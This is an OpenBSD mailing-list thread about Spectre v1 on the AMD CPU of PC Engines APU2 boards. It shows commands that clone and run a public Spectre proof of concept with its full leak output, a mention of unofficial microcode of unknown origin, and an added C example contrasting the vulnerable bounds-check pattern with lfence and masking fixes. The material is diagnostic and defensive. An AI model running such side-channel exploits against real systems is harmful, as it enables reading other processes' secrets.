Re: APU2 and Spectre
If someone is interested:

https://github.com/kolargol/apu2_firmware

of course for testing bins, OpenBSD reports IBPB:

cpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,CFLUSH,MMX,FXSR,SSE,SSE2,HTT,SSE3,PCLMUL,MWAIT,SSSE3,CX16,SSE4.1,SSE4.2,MOVBE,POPCNT,AES,XSAVE,AVX,F16C,NXE,MMXX,FFXSR,PAGE1GB,RDTSCP,LONG,LAHF,CMPLEG,SVM,EAPICSP,AMCR8,ABM,SSE4A,MASSE,3DNOWP,OSVW,IBS,SKINIT,TOPEXT,DBKP,PERFTSC,PCTRL3,ITSC,BMI1,IBPB,XSAVEOPT

On 21:11 Mon 10 Sep, Zbyszek Żółkiewski wrote:
>
> > Message written by Consus < con...@ftml.net > on 25.08.2018, at 17:08:
> >
> > Seems like APU2 board is vulnerable to Spectre:
>
> seems there is microcode update with mitigations but looks like none want to
> claim where that microcode comes from:
>
> https://github.com/pcengines/apu2-documentation/issues/75
>
> did someone try to load it from obsd? is it possible?

>> There is an unofficial binary with unknown origin. Seems like AMD have
>> sent microcode updates to some motherboard manufacturers, but there is
>> no hard proof though.
Re: APU2 and Spectre
On 21:11 Mon 10 Sep, Zbyszek Żółkiewski wrote:
>
> > Message written by Consus on 25.08.2018, at 17:08:
> >
> > Seems like APU2 board is vulnerable to Spectre:
>
> seems there is microcode update with mitigations but looks like none want to
> claim where that microcode comes from:
>
> https://github.com/pcengines/apu2-documentation/issues/75
>
> did someone try to load it from obsd? is it possible?

There is an unofficial binary with unknown origin. Seems like AMD have
sent microcode updates to some motherboard manufacturers, but there is
no hard proof though.
Re: APU2 and Spectre
> Message written by Consus on 25.08.2018, at 17:08:
>
> Seems like APU2 board is vulnerable to Spectre:

seems there is microcode update with mitigations but looks like none want to
claim where that microcode comes from:

https://github.com/pcengines/apu2-documentation/issues/75

did someone try to load it from obsd? is it possible?

_
Zbyszek Żółkiewski
Re: APU2 and Spectre
On Sat, Aug 25, 2018 at 06:08:49PM +0300, Consus wrote:
> Hi,
>
> Seems like APU2 board is vulnerable to Spectre:
>
> $ uname -r
> 6.3
> $ dmesg | grep cpu0 | grep AMD
> cpu0: AMD GX-412TC SOC, 998.27 MHz
> $ git clone https://github.com/crozone/SpectrePoC
> $ cd SpectrePoC
> $ gmake
> $ ./spectre.out 85
> Using a cache hit threshold of 85.
> Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
> INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED
> Reading 40 bytes:
> Reading at malicious_x = 0xffeff180... Success: 0x54=’T’ score=2
> Reading at malicious_x = 0xffeff181... Success: 0x68=’h’ score=2
> Reading at malicious_x = 0xffeff182... Success: 0x65=’e’ score=2
> Reading at malicious_x = 0xffeff183... Success: 0x20=’ ’ score=2
> Reading at malicious_x = 0xffeff184... Success: 0x4D=’M’ score=2
> Reading at malicious_x = 0xffeff185... Success: 0x61=’a’ score=2
> Reading at malicious_x = 0xffeff186... Success: 0x67=’g’ score=2
> Reading at malicious_x = 0xffeff187... Success: 0x69=’i’ score=2
> Reading at malicious_x = 0xffeff188... Success: 0x63=’c’ score=2
> Reading at malicious_x = 0xffeff189... Success: 0x20=’ ’ score=2
> Reading at malicious_x = 0xffeff18a... Success: 0x57=’W’ score=2
> Reading at malicious_x = 0xffeff18b... Success: 0x6F=’o’ score=2
> Reading at malicious_x = 0xffeff18c... Success: 0x72=’r’ score=2
> Reading at malicious_x = 0xffeff18d... Success: 0x64=’d’ score=2
> Reading at malicious_x = 0xffeff18e... Success: 0x73=’s’ score=2
> Reading at malicious_x = 0xffeff18f... Success: 0x20=’ ’ score=2
> Reading at malicious_x = 0xffeff190... Success: 0x61=’a’ score=2
> Reading at malicious_x = 0xffeff191... Success: 0x72=’r’ score=2
> Reading at malicious_x = 0xffeff192... Success: 0x65=’e’ score=2
> Reading at malicious_x = 0xffeff193... Success: 0x20=’ ’ score=2
> Reading at malicious_x = 0xffeff194... Success: 0x53=’S’ score=2
> Reading at malicious_x = 0xffeff195... Success: 0x71=’q’ score=2
> Reading at malicious_x = 0xffeff196... Success: 0x75=’u’ score=2
> Reading at malicious_x = 0xffeff197... Success: 0x65=’e’ score=2
> Reading at malicious_x = 0xffeff198... Success: 0x61=’a’ score=2
> Reading at malicious_x = 0xffeff199... Success: 0x6D=’m’ score=2
> Reading at malicious_x = 0xffeff19a... Success: 0x69=’i’ score=2
> Reading at malicious_x = 0xffeff19b... Success: 0x73=’s’ score=2
> Reading at malicious_x = 0xffeff19c... Success: 0x68=’h’ score=2
> Reading at malicious_x = 0xffeff19d... Success: 0x20=’ ’ score=2
> Reading at malicious_x = 0xffeff19e... Success: 0x4F=’O’ score=2
> Reading at malicious_x = 0xffeff19f... Success: 0x73=’s’ score=2
> Reading at malicious_x = 0xffeff1a0... Success: 0x73=’s’ score=2
> Reading at malicious_x = 0xffeff1a1... Success: 0x69=’i’ score=2
> Reading at malicious_x = 0xffeff1a2... Success: 0x66=’f’ score=2
> Reading at malicious_x = 0xffeff1a3... Success: 0x72=’r’ score=2
> Reading at malicious_x = 0xffeff1a4... Success: 0x61=’a’ score=2
> Reading at malicious_x = 0xffeff1a5... Success: 0x67=’g’ score=2
> Reading at malicious_x = 0xffeff1a6... Success: 0x65=’e’ score=2
> Reading at malicious_x = 0xffeff1a7... Success: 0x2E=’.’ score=2
>
> I've double-checked output of syspatch(1) and fw_update(1) but no
> pending updates exist. Am I missing something or there is no mitigation
> for this AMD CPU family?
>

That's spectre v1 IIRC. And yes, AMD is susceptible. Someone will need
to do the work to move the lfence changes into llvm/clang (maybe that's
already done) and you'll need an AMD cpu with the MSR to treat lfence as
serializing (that is already committed, but you obviously need that CPU
capability).

-ml
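
Added example (not part of the thread, and not code from SpectrePoC or OpenBSD): the bounds-check-bypass pattern behind Spectre v1 next to two hardened forms, an lfence after the check as the reply above describes and an index mask. The names table, probe, probe_init and lookup_* are made up for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#if defined(__x86_64__) || defined(__i386__)
#include <emmintrin.h>                 /* _mm_lfence() */
#define SPEC_BARRIER() _mm_lfence()
#else                                  /* off x86: compiler barrier only, not a speculation fence */
#define SPEC_BARRIER() __asm__ volatile("" ::: "memory")
#endif

#define TABLE_LEN 16u                  /* power of two, required by the mask variant */
static uint8_t table[TABLE_LEN] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16};
static uint8_t probe[256 * 512];       /* second array: its cache state is what leaks */

void probe_init(void) {                /* make probe[v * 512] == v so results are checkable */
    for (size_t v = 0; v < 256; v++) probe[v * 512] = (uint8_t)v;
}

/* Unmitigated pattern: if the branch is mispredicted with idx out of range,
 * both dependent loads can run speculatively before the check resolves. */
uint8_t lookup_unsafe(size_t idx) {
    if (idx < TABLE_LEN)
        return probe[table[idx] * 512];
    return 0;
}

/* Fence variant: the loads may not issue until the bounds check has completed.
 * On AMD this depends on lfence being serializing (the MSR the reply mentions). */
uint8_t lookup_lfence(size_t idx) {
    if (idx < TABLE_LEN) {
        SPEC_BARRIER();
        return probe[table[idx] * 512];
    }
    return 0;
}

/* Mask variant: even on a mispredicted path the index stays inside table[]. */
uint8_t lookup_masked(size_t idx) {
    if (idx < TABLE_LEN)
        return probe[table[idx & (TABLE_LEN - 1)] * 512];
    return 0;
}

int main(void) {
    probe_init();
    printf("%u %u %u\n", (unsigned)lookup_unsafe(3), (unsigned)lookup_lfence(3), (unsigned)lookup_masked(3));
    return 0;
}
```

All three functions return the same architectural results; they differ only in what the CPU may load while the bounds check is still unresolved.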
APU2 and Spectre
Hi,

Seems like APU2 board is vulnerable to Spectre:

$ uname -r
6.3
$ dmesg | grep cpu0 | grep AMD
cpu0: AMD GX-412TC SOC, 998.27 MHz
$ git clone https://github.com/crozone/SpectrePoC
$ cd SpectrePoC
$ gmake
$ ./spectre.out 85
Using a cache hit threshold of 85.
Build: RDTSCP_SUPPORTED MFENCE_SUPPORTED CLFLUSH_SUPPORTED
INTEL_MITIGATION_DISABLED LINUX_KERNEL_MITIGATION_DISABLED
Reading 40 bytes:
Reading at malicious_x = 0xffeff180... Success: 0x54=’T’ score=2
Reading at malicious_x = 0xffeff181... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffeff182... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff183... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff184... Success: 0x4D=’M’ score=2
Reading at malicious_x = 0xffeff185... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff186... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffeff187... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffeff188... Success: 0x63=’c’ score=2
Reading at malicious_x = 0xffeff189... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff18a... Success: 0x57=’W’ score=2
Reading at malicious_x = 0xffeff18b... Success: 0x6F=’o’ score=2
Reading at malicious_x = 0xffeff18c... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffeff18d... Success: 0x64=’d’ score=2
Reading at malicious_x = 0xffeff18e... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff18f... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff190... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff191... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffeff192... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff193... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff194... Success: 0x53=’S’ score=2
Reading at malicious_x = 0xffeff195... Success: 0x71=’q’ score=2
Reading at malicious_x = 0xffeff196... Success: 0x75=’u’ score=2
Reading at malicious_x = 0xffeff197... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff198... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff199... Success: 0x6D=’m’ score=2
Reading at malicious_x = 0xffeff19a... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffeff19b... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff19c... Success: 0x68=’h’ score=2
Reading at malicious_x = 0xffeff19d... Success: 0x20=’ ’ score=2
Reading at malicious_x = 0xffeff19e... Success: 0x4F=’O’ score=2
Reading at malicious_x = 0xffeff19f... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff1a0... Success: 0x73=’s’ score=2
Reading at malicious_x = 0xffeff1a1... Success: 0x69=’i’ score=2
Reading at malicious_x = 0xffeff1a2... Success: 0x66=’f’ score=2
Reading at malicious_x = 0xffeff1a3... Success: 0x72=’r’ score=2
Reading at malicious_x = 0xffeff1a4... Success: 0x61=’a’ score=2
Reading at malicious_x = 0xffeff1a5... Success: 0x67=’g’ score=2
Reading at malicious_x = 0xffeff1a6... Success: 0x65=’e’ score=2
Reading at malicious_x = 0xffeff1a7... Success: 0x2E=’.’ score=2

I've double-checked output of syspatch(1) and fw_update(1) but no
pending updates exist. Am I missing something or there is no mitigation
for this AMD CPU family?